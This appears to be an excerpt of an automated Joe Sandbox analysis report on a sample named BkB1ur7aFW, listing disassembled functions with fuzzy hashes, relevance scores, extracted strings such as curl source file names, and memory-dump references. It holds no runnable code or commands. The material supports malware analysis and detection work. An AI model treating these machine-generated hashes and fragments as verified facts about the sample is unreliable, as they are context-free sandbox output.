                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$&$urlapi.c
                                                              • API String ID: 0-3891957821
                                                              • Opcode ID: a01463be6859443dbd5769cffdf3bc53482629e6c421d6b277991a2ebb9f06c2
                                                              • Instruction ID: 7a67f6ffc53d1630991e8c3b415fb7be116543acd16d61592b754632545cfacb
                                                              • Opcode Fuzzy Hash: a01463be6859443dbd5769cffdf3bc53482629e6c421d6b277991a2ebb9f06c2
                                                              • Instruction Fuzzy Hash: 5322CFB1A083409BEB244A209C517FB77D68B92318F16452FF89A463C2F63DD8C9C75B
                                                              Function 007817A0 Relevance: 4.0, Strings: 2, Instructions: 1506COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $
                                                              • API String ID: 0-227171996
                                                              • Opcode ID: e0f295440a581dce666d18e0e68ff829c1dd38467376fbb4b0cc3a5bd10474e8
                                                              • Instruction ID: 7ca5f10aa2c854e34214ca5e436584864e28c3dbcdabb13c0787822a8b73c38c
                                                              • Opcode Fuzzy Hash: e0f295440a581dce666d18e0e68ff829c1dd38467376fbb4b0cc3a5bd10474e8
                                                              • Instruction Fuzzy Hash: 11E233B1A483818FD710EF29C18475AFBE0BF88754F14891DE89597362E779E846CF82
                                                              Function 0041DCF0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                                              • API String ID: 0-424504254
                                                              • Opcode ID: 4f7732fc572bbf46979b78945803aeb3b3fc5fe272a2ad4f2a506396f2efb48e
                                                              • Instruction ID: 8ad5647d894ab3b1632cd778e5f091c185572dac3d4175448a3dbce0e32bdd11
                                                              • Opcode Fuzzy Hash: 4f7732fc572bbf46979b78945803aeb3b3fc5fe272a2ad4f2a506396f2efb48e
                                                              • Instruction Fuzzy Hash: A73148B2F0875157D725193CAC85AB67A815FD2358F18423EE4898B3D2FA5D8C80C29A
                                                              Function 00768BF0 Relevance: 3.0, Strings: 2, Instructions: 512COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$4
                                                              • API String ID: 0-353776824
                                                              • Opcode ID: c7ff5268492433f010ca2778ca2ae80764411dfa963106e04977ab4b4ea7c84b
                                                              • Instruction ID: 729ed90de312e03640f994dc6f5ed9aae8321d0dcbd1ccd11431c4911de7470d
                                                              • Opcode Fuzzy Hash: c7ff5268492433f010ca2778ca2ae80764411dfa963106e04977ab4b4ea7c84b
                                                              • Instruction Fuzzy Hash: BB22F6316087428FC354DF28C4806AAF7E4FF85314F148B2EE89A97391D779A885CB97
                                                              Function 00761BD0 Relevance: 3.0, Strings: 2, Instructions: 463COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$4
                                                              • API String ID: 0-353776824
                                                              • Opcode ID: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                                              • Instruction ID: a14016ff6deb5349d2f453b2ef25866bcfccfd2bc0128caf2d8a43e2279edb16
                                                              • Opcode Fuzzy Hash: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                                              • Instruction Fuzzy Hash: DC12D1326087018BC764CF18C4847AAB7E5FFD4318F198A7DEC9A57392D7799885CB82
                                                              Function 00774780 Relevance: 2.9, Strings: 2, Instructions: 446COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H$xn--
                                                              • API String ID: 0-4022323365
                                                              • Opcode ID: 2bbdfb34b130b8f4256b61872e90278cf9ddadab548dc9f766a57435d3ee466e
                                                              • Instruction ID: 782c2ef18b474558e2595088fb2ef328621a8bb4eacf161f94c5edfb10a75933
                                                              • Opcode Fuzzy Hash: 2bbdfb34b130b8f4256b61872e90278cf9ddadab548dc9f766a57435d3ee466e
                                                              • Instruction Fuzzy Hash: 88E12B717087158BDB28DE28D8C072AB7E2ABC8354F19CA3DD9DA87391E778DC458742
                                                              Function 004010E6 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Downgrades to HTTP/1.1$multi.c
                                                              • API String ID: 0-3089350377
                                                              • Opcode ID: 31b282160095ed9dad4b154d24f0b30ac0e4912bbf7baa67c2b181d87c687fae
                                                              • Instruction ID: 25e2539a6f445d4ac5f985f2d84ab697702591ca4d40836c09da2084e4fac539
                                                              • Opcode Fuzzy Hash: 31b282160095ed9dad4b154d24f0b30ac0e4912bbf7baa67c2b181d87c687fae
                                                              • Instruction Fuzzy Hash: 19C12871A08301ABE7109F64D88176BB7E0BF95308F04853EF549673E2E778E959CB86
                                                              Function 004B8F90 Relevance: 2.8, Strings: 2, Instructions: 256COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 127.0.0.1$::1
                                                              • API String ID: 0-3302937015
                                                              • Opcode ID: 07f9dee429b838c54e72403fafeb4f8d524ef1824b182fe3fae462d4ff98cdd3
                                                              • Instruction ID: 002e3e633acff48eb42faf9fc05b7d7fe86d8df52b6fd38580a3b68725919196
                                                              • Opcode Fuzzy Hash: 07f9dee429b838c54e72403fafeb4f8d524ef1824b182fe3fae462d4ff98cdd3
                                                              • Instruction Fuzzy Hash: 73A1F571C04342ABE700DF65C845767B3E0AF9A304F15862AF9488B362F779ED90D7A6
                                                              Function 0070AE30 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ME
                                                              • API String ID: 0-2807042251
                                                              • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction ID: 1d8120deac137974c5fe4c9febdf492ce9518c7bc96c70629c5d2c6096f21208
                                                              • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction Fuzzy Hash: 082264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                                              Function 00757CC0 Relevance: 1.8, Strings: 1, Instructions: 517COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: D
                                                              • API String ID: 0-2746444292
                                                              • Opcode ID: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                                              • Instruction ID: fc946c88faebe27d3d688313a82e4edb4ef87dcbbadfe98c99ce327903569d5f
                                                              • Opcode Fuzzy Hash: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                                              • Instruction Fuzzy Hash: 00328D7190C3818BC325DF28D4806AEF7E1BFC9304F198A6DE9D967351EB74A945CB82
                                                              Function 004C00E0 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H
                                                              • API String ID: 0-2852464175
                                                              • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                                              • Instruction ID: 7e7ae7d21440ba95732345616ac4a3b25949fc27ccb1b1dfcc9f94466a2ace4e
                                                              • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                                              • Instruction Fuzzy Hash: AD91E935708351CFCB58CE1CC490A2EF3E3ABC9314F1A857ED99697391DA359C468B8A
                                                              Function 07130840 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 62dcb89cf0738f91ea3545528969f5110dd24b330ddba6349a8eee62cb4f7c04
                                                              • Instruction ID: ea951d877adafda98f0102872e27c954f7373733abc3ed7853f3d763aef96833
                                                              • Opcode Fuzzy Hash: 62dcb89cf0738f91ea3545528969f5110dd24b330ddba6349a8eee62cb4f7c04
                                                              • Instruction Fuzzy Hash: 81D017FB64C5606DB201C0127B68AFAA36EE0C5731332C96BF443C100AE3984A4E51B2
                                                              Function 0076CD80 Relevance: .6, Instructions: 574COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
